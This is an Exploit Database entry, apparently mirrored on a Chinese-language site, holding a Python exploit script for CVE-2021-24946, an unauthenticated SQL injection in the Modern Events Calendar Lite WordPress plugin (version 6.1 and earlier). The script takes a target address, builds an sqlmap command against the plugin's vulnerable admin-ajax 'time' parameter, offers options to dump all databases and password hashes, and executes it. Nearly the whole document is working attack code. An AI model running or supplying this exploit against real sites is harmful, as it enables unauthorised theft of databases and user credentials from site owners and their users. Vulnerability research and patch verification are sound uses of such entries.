WordPress Plugin Modern Events Calendar V 6.1 – SQL Injection (Unauthenticated)

• Exploit Database
• 37 阅读

• 作者： Ron Jost
  日期： 2022-01-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50687/

• # Exploit Title: WordPress Plugin Modern Events Calendar V 6.1 - SQL Injection (Unauthenticated)
  # Date 26.01.2022
  # Exploit Author: Ron Jost (Hacker5preme)
  # Vendor Homepage: https://webnus.net/modern-events-calendar/
  # Software Link: https://downloads.wordpress.org/plugin/modern-events-calendar-lite.6.1.0.zip
  # Version: <= 6.1
  # Tested on: Ubuntu 20.04
  # CVE: CVE-2021-24946
  # CWE: CWE-89
  # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24946/README.md
  
  '''
  Description:
  The Modern Events Calendar Lite WordPress plugin before 6.1.5 does not sanitise and escape the time parameter
  before using it in a SQL statement in the mec_load_single_page AJAX action, available to unauthenticated users,
  leading to an unauthenticated SQL injection issue
  '''
  
  #Banner:
  banner = '''
  
   .oOOOo.o'O o.OOoOoo 
  .O oO oO .oOOo. .oOOo. .oOOo.oO .oOOo. o O.oOOo. o O.oOOo. 
  o o OoO OoO OO O oOo O oO
  o o oooOO o oOo oo o ooO o oo
  o OO'O ooooooooo O' oo O' O ooooooooo O' OooOOo `OooOo OooOOo OoOOo. 
  O `oooO OOO oO O O OOO 
  `o .o`oO O.OoO.OO.Oo o oOo 
   `OoooO'`o' ooOooOoO oOoOoO `OooO' oOoOoO OooOO oOoOoO O`OooO' O`OooO' 
   
  [+] Modern Events Calendar Lite SQL-Injection
  [@] Developed by Ron Jost (Hacker5preme)
  
  '''
  
  print(banner)
  
  import requests
  import argparse
  from datetime import datetime
  import os
  
  # User-Input:
  my_parser = argparse.ArgumentParser(description='Wordpress Plugin Modern Events Calendar SQL-Injection (unauthenticated)')
  my_parser.add_argument('-T', '--IP', type=str)
  my_parser.add_argument('-P', '--PORT', type=str)
  my_parser.add_argument('-U', '--PATH', type=str)
  args = my_parser.parse_args()
  target_ip = args.IP
  target_port = args.PORT
  wp_path = args.PATH
  
  
  # Exploit:
  print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))
  print('[*] Payload for SQL-Injection:')
  exploitcode_url = r'sqlmap "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin-ajax.php?action=mec_load_single_page&time=2" '
  exploitcode_risk = ' -p time'
  print('Sqlmap options:')
  print(' -a, --all Retrieve everything')
  print(' -b, --bannerRetrieve DBMS banner')
  print(' --current-userRetrieve DBMS current user')
  print(' --current-dbRetrieve DBMS current database')
  print(' --passwords Enumerate DBMS users password hashes')
  print(' --tablesEnumerate DBMS database tables')
  print(' --columns Enumerate DBMS database table column')
  print(' --schemaEnumerate DBMS schema')
  print(' --dumpDump DBMS database table entries')
  print(' --dump-allDump all DBMS databases tables entries')
  retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')
  exploitcode = exploitcode_url +retrieve_mode + exploitcode_risk
  os.system(exploitcode)
  print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))